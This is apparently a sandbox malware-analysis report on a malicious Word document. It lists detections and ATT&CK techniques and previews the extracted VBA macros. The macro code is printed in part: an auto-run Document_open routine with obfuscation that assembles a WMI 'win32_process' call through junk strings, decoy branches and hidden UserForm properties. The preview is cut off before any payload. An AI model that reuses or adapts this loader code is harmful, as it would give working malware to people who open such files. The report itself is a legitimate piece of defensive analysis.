MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro that utilizes a hidden UserForm command stager. This technique is commonly used to obfuscate the execution of malicious code, often involving the creation of objects to download and execute further payloads. The ClamAV detection further supports its malicious nature.
Heuristics 7
-
ClamAV: Doc.Malware.Sagent-9401419-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-9401419-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15428 bytes |
SHA-256: 06ef3089ae1eacf6fbae8a5da9610b79b11a2cfb9f3c91e8e9a2c84577794915 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Vg3ugxelvrlzed9hwz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Sf4dqd6iw65q.T7wnceflceber74
End Sub
Attribute VB_Name = "Sf4dqd6iw65q"
Attribute VB_Base = "0{48C75266-7CEB-4D4E-BA70-7FA9510850F9}{9B9F1939-CA22-4B47-8377-DEB12F5C17DE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function T7wnceflceber74()
Nrpfn1tngfbnfmdn8w = "637"
If Len("Ynj91ucwnnyc7Uw59kn4au9elmu") = Len("Hk1e_luku1vkdf_tc") + 1 Then End
If Len("Xn2jpxiu85l4Ft5dd908filkizS7upcfphba6") < Len("Wpo1_2ko3kb") Then
MsgBox "Pek3eq_g9f6bj72j3m" + "Ci6cr3smt9lmp5y59"
MsgBox ("Rcwayf1umrd_bwps9")
MsgBox "Tb4awdrjx5qiwb5o" + "Ggdv1m8pbiu"
End If
If Len("S897_d8cyqsups8ee6Exsfm6dbz7v") = Len("W9m99smx08mq4yu") Then
MsgBox "Fq4khhnkh2wb" + "Bhgc8xxdv_x4hdjkbn"
MsgBox ("I05jdlnyub1g8l37 !!!")
MsgBox "Eo8b8cwrgs_edago" + "S9i0c3t0cb641rqhud"
End If
Ld83k56umwr = Sf4dqd6iw65q.HelpContextId + 50 + 50
V0actu6res35x8e = "916"
If Len("Wxk4xuazhyhbqzzf8nYt742gucwgn327le") = Len("P69j9l77n5b") + 1 Then End
If Len("Ux8kfgq_6twcsoV8qfeuvtcprah_8Jtx4tqrvz6ekci") < Len("Tt5b_8z86id57zfia") Then
MsgBox "Dju6v0op7qjqlr5u1r" + "Y9ryw4vqww8twe"
MsgBox ("Y_k896xubiyp9")
MsgBox "Zl0z6b_zv0cat450" + "Ql0t6j4tulopq9ny4w"
End If
If Len("Y63cmjpm69m61Hbd0dfbggl2") = Len("Geazm1gtac6jxkq") Then
MsgBox "Yvhqymf8k11rj3zrl1" + "Hlgvwzhcig6l41divd"
MsgBox ("Y90eoxazkjoo9 !!!")
MsgBox "Hfw2aw3rk92qo83fte" + "A3cmh39w_8453"
End If
Zqe11tc7slxyfkwai = ChrW(Ld83k56umwr + (15))
O2ajj2cssr2 = "752"
If Len("E9pqj11ry1fo75swgnS2otis1erwucp3m") = Len("Jonp3mlp6wxo") + 1 Then End
If Len("Grme0bh3oh0uvjCy2wuvfh402op0zw6Sifh0q2er0ho7") < Len("Bqlh7b65djtf") Then
MsgBox "Q351veh8b28z" + "Wpeg_pcvm_xs2"
MsgBox ("M6e7y4idnxjxkzka1")
MsgBox "Nvgq19kedxl4gi" + "H1b86j8c3bs8nfoll"
End If
If Len("G_fybfhwuzv4vA4_0id7gwtooha") = Len("Z1m_t9izyz71jzhr0q") Then
MsgBox "Xvfqchocowj" + "Yhzu_j4bt4dmjmow"
MsgBox ("Kcp9gem5kk4f76 !!!")
MsgBox "Kb0sufhhgos" + "M5g143w0u51"
End If
Elj6thrnpk_98q8ja0 = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + Zqe11tc7slxyfkwai + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Sf4dqd6iw65q.Sbicpimbs57oa9_ + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
Bbr2wpasobsn = "45"
If Len("Fq59zwdb56odgjcz0eAgeo2y85f_qe_tbdq") = Len("Jcereigdxpg95p8zn2") + 1 Then End
If Len("Bcj440bo2ouDw4wbztb8hyaQhgahkgkao4djl") < Len("C6qzckala57a51g") Then
MsgBox "Kjmf27ntdo6ei_s3n" + "Yb3_9gx7fhm"
MsgBox ("Jv5uo69g3hs9v")
MsgBox "L8damdx52fdplft6" + "Eg5bkkywy6gi2u5o"
End If
If Len("T24f7jxt5zr0Uy9sm23yfwqpyjq") = Len("Avjbdo3cvk9gsqw") Then
MsgBox "Qectkjicxvwe" + "Shag05di9qo77"
MsgBox ("A5vgzaj4ug9l3ngpt4 !!!")
MsgBox "S6d8_uxs0zzzyplh" + "Bo8ed9y5jxc2"
End If
I7o9scg_fx0u5u = W6bxcb63rbrdfpvds5(Elj6thrnpk_98q8ja0)
Uz1uet561r3n = "909"
If Len("Bp6xg8w9nb85dw32e0Ub_p11e2svbn") = Len("K928ffpyshqx42b8c") + 1 Then End
If Len("
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.